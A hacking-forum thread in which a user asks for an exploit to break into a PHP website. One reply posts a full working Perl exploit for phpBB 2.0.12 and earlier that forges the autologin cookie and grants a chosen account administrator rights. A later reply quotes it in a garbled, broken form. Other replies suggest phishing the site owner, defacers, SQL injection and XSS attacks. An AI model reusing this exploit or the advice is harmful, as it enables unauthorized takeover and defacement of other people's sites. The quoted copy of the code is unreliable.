Results 1 to 13 of 13
  1. #1
    blackout385's Avatar
    Join Date
    Jan 2009
    Gender
    male
    Posts
    10
    Reputation
    10
    Thanks
    1

    Exclamation An exploit to hack a php website?

    hey does anyone have an exploit to hack a php website?

  2. #2
    [D]evliin's Avatar
    Join Date
    Apr 2008
    Gender
    male
    Location
    Meh.
    Posts
    1,388
    Reputation
    22
    Thanks
    73
    My Mood
    Happy
    not a clue.

  3. #3
    marian_bosss's Avatar
    Join Date
    Dec 2008
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    you are a lyar this adress is to your habamon not to exp[loits hack

  4. #4
    Sjoerd's Avatar
    Join Date
    Jan 2008
    Gender
    male
    Location
    Aurora Borealis
    Posts
    16,883
    Reputation
    1198
    Thanks
    2,086
    My Mood
    Hot
    #!/usr/bin/perl -w

    # phpBB <=2.0.12 session autologin exploit
    # This script uses the vulerability in autologinid variable
    # More: phpBB &bull; View topic - phpBB 2.0.13 released - Critical Update
    #
    # Just gives an user on vulnerable forum administrator rights.
    # You should register the user before using this ;-)

    # by Kutas, kutas@mail15.com
    #P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
    # but greets goes to Paisterist who made an exploit for Firefox cookies...

    if (@ARGV < 3)
    {
    print q(
    ++++++++++++++++++++++++++++++++++++++++++++++++++ +
    Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
    i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
    ++++++++++++++++++++++++++++++++++++++++++++++++++ ++
    );
    exit;
    }
    use strict;
    use LWP::UserAgent;

    my $host = $ARGV[0];
    my $path = $ARGV[1];
    my $user = $ARGV[2];
    my $proxy = $ARGV[3];
    my $request = "https://";
    $request .= $host;
    $request .= $path;


    use HTTP::Cookies;
    my $browser = LWP::UserAgent->new ();
    my $cookie_jar = HTTP::Cookies->new( );
    $browser->cookie_jar( $cookie_jar );
    $cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
    if ( defined $proxy) {
    $proxy =~ s/(https:\/\/)//eg;
    $browser->proxy("http" , "https://$proxy");
    }
    print "++++++++++++++++++++++++++++++++++++\n";
    print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

    my $response = $browser->get($request);
    die "Error: ", $response->status_line
    unless $response->is_success;

    if($response->content =~ m/phpbbprivmsg/) {
    print "\n Forum is vulnerable!!!\n";
    } else {
    print "Sorry... Not vulnerable"; exit();}

    print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
    $response->content =~ /sid=([\w\d]*)/;
    my $sid = $1;

    $request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
    $response = $browser->post(
    $request,
    [
    'username' => $user,
    'mode' => 'edit',
    'mode' => 'user',
    'submituser' => 'Look+up+User'
    ],
    );
    die "Error: ", $response->status_line
    unless $response->is_success;

    if ($response->content =~ /name="u" value="([\d]*)"/)
    {print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
    else {print "No user $user found..."; exit(); }
    my $uid = $1;
    print "Trying to give user:$user admin status...\n";

    $response = $browser->post(
    $request,
    [
    'userlevel' => 'admin',
    'mode' => 'user',
    'adv'=>'',
    'u'=> $uid,
    'submit'=> 'Submit'
    ],
    );
    die "Error: ", $response->status_line
    unless $response->is_success;
    print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

    # milw0rm.com [2005-03-21]







  5. The Following User Says Thank You to Sjoerd For This Useful Post:

    ryanterror (05-04-2009)

  6. #5
    hanamana's Avatar
    Join Date
    Apr 2009
    Posts
    11
    Reputation
    10
    Thanks
    3
    PHP is processed on server side and completely invisible on client side. near impossible to 'hack'

  7. The Following User Says Thank You to hanamana For This Useful Post:

    ryanterror (05-04-2009)

  8. #6
    Gabbb's Avatar
    Join Date
    Apr 2009
    Gender
    male
    Location
    Secret... Why are you keep on asking bullshiits?
    Posts
    62
    Reputation
    10
    Thanks
    292
    Try to use a defacer. I have used it when my friend gave me one but it's kinda hard to understand even i have a tutorial. The one who made that defacer hacked microsoft france site.

  9. The Following User Says Thank You to Gabbb For This Useful Post:

    ryanterror (05-04-2009)

  10. #7
    GG2GG's Avatar
    Join Date
    Mar 2008
    Gender
    male
    Location
    United Kingdom
    Posts
    3,382
    Reputation
    21
    Thanks
    4,294,967,295
    My Mood
    Blah
    Quote Originally Posted by Sjla View Post
    #!/usr/bin/perl -w

    # phpBB <=2.0.12 session autologin exploit
    # This script uses the vulerability in autologinid variable
    # More: phpBB &bull; View topic - phpBB 2.0.13 released - Critical Update
    #
    # Just gives an user on vulnerable forum administrator rights.
    # You should register the user before using this ;-)

    # by Kutas, kutas@mail15.com
    #P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
    # but greets goes to Paisterist who made an exploit for Firefox cookies...

    if (@ARGV < 3)
    {
    print q(
    ++++++++++++++++++++++++++++++++++++++++++++++++++ +
    Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
    i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
    ++++++++++++++++++++++++++++++++++++++++++++++++++ ++
    );
    exit;
    }
    use strict;
    use LWP::UserAgent;

    my = ;
    my = ;
    my = ;
    my = ;
    my = "https://";
    .= ;
    .= ;


    use HTTP::Cookies;
    my = LWP::UserAgent->new ();
    my = HTTP::Cookies->new( );
    ( );
    ( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",,,,,,);
    if ( defined ) {
    =~ s/(https://)//eg;
    ("http" , "https://");
    }
    print "++++++++++++++++++++++++++++++++++++n";
    print "Trying to connect to "; if () {print "using proxy ";}

    my = ();
    die "Error: ",
    unless ;

    if( =~ m/phpbbprivmsg/) {
    print "n Forum is vulnerable!!!n";
    } else {
    print "Sorry... Not vulnerable"; exit();}

    print "+++++++++++++++++++++++++++++nTrying to get the user: ID...n";
    =~ /sid=([wd]*)/;
    my = $1;

    .= "admin/admin_ug_auth.php?mode=user&sid=";
    = (
    ,
    [
    'username' => ,
    'mode' => 'edit',
    'mode' => 'user',
    'submituser' => 'Look+up+User'
    ],
    );
    die "Error: ",
    unless ;

    if ( =~ /name="u" value="([d]*)"/)
    {print " Done... ID=$1n++++++++++++++++++++++++++++++n";}
    else {print "No user found..."; exit(); }
    my = $1;
    print "Trying to give user: admin status...n";

    = (
    ,
    [
    'userlevel' => 'admin',
    'mode' => 'user',
    'adv'=>'',
    'u'=> ,
    'submit'=> 'Submit'
    ],
    );
    die "Error: ",
    unless ;
    print " Well done!!! should now have an admin status..n++++++++++++++++++++++++++++";

    # milw0rm.com [2005-03-21]
    way to fail, he said he wants to hack a php site, not phpbb forum script, fail again for posting a public exploit that you cant even use.

    to answer the question i would require a link to the site in question or informaiton about php scripts its running.

    Quote Originally Posted by hanamana View Post
    PHP is processed on server side and completely invisible on client side. near impossible to 'hack'

    php is processed server sided but retrives information from the cilent, when dealing with hacking logins you use the language php, to communicate directly with mysql which holds the user and passwords, and either exploit and read from the mysql tables or by pass the login buy making the site belive you entered a vaild login.

    in short find or create a exploit. insert the malicious php code ie retrive usernames or create users.
    Last edited by GG2GG; 05-28-2009 at 12:10 PM.

  11. #8
    Chuck Norris's Avatar
    Join Date
    Jan 2008
    Gender
    male
    Location
    Between my ears
    Posts
    1,703
    Reputation
    86
    Thanks
    456
    My Mood
    Angelic
    you can do packet editing at php right?
    “Those who control the past, control the future: who controls the present controls the past” ~ George Orwell

    Its me, Dreamgun

  12. #9
    Toymaker's Avatar
    Join Date
    Feb 2008
    Gender
    male
    Location
    Hannah, Montana
    Posts
    659
    Reputation
    14
    Thanks
    191
    My Mood
    Amused
    There is a lot of ways to manipulate information and hack web sites. Hell if you're clever enough, you could just phish the site owner's password haha. I've found some tricks and scripts that have all pretty much sent false information, or constructed, to their server to rip out important aspects.

  13. #10
    griminal's Avatar
    Join Date
    Apr 2008
    Posts
    21
    Reputation
    10
    Thanks
    6
    Look up SQL injection...

  14. #11
    Sjoerd's Avatar
    Join Date
    Jan 2008
    Gender
    male
    Location
    Aurora Borealis
    Posts
    16,883
    Reputation
    1198
    Thanks
    2,086
    My Mood
    Hot
    Quote Originally Posted by GG2GG View Post
    way to fail, he said he wants to hack a php site, not phpbb forum script, fail again for posting a public exploit that you cant even use.

    to answer the question i would require a link to the site in question or informaiton about php scripts its running.
    Lmao i do know how to use it :/







  15. #12
    Lanny's Avatar
    Join Date
    Dec 2008
    Gender
    male
    Posts
    12
    Reputation
    10
    Thanks
    1
    Learn how to XSS Script attack.

Similar Threads

  1. Need help injecting a hack from this website!
    By papy1 in forum Combat Arms Help
    Replies: 17
    Last Post: 05-30-2011, 05:15 PM
  2. [Info] It supose to be free VIP hack on this website
    By crysis278 in forum CrossFire Hacks & Cheats
    Replies: 15
    Last Post: 03-03-2010, 08:44 AM
  3. Selling Hack Pack Including Website Downers, Viruses and more!
    By GRAPH1C-SALES in forum Trade Accounts/Keys/Items
    Replies: 3
    Last Post: 09-22-2009, 02:14 AM
  4. Selling hacking tool for websites
    By Joshcarr2006 in forum Trade Accounts/Keys/Items
    Replies: 33
    Last Post: 09-11-2009, 01:34 AM

Tags for this Thread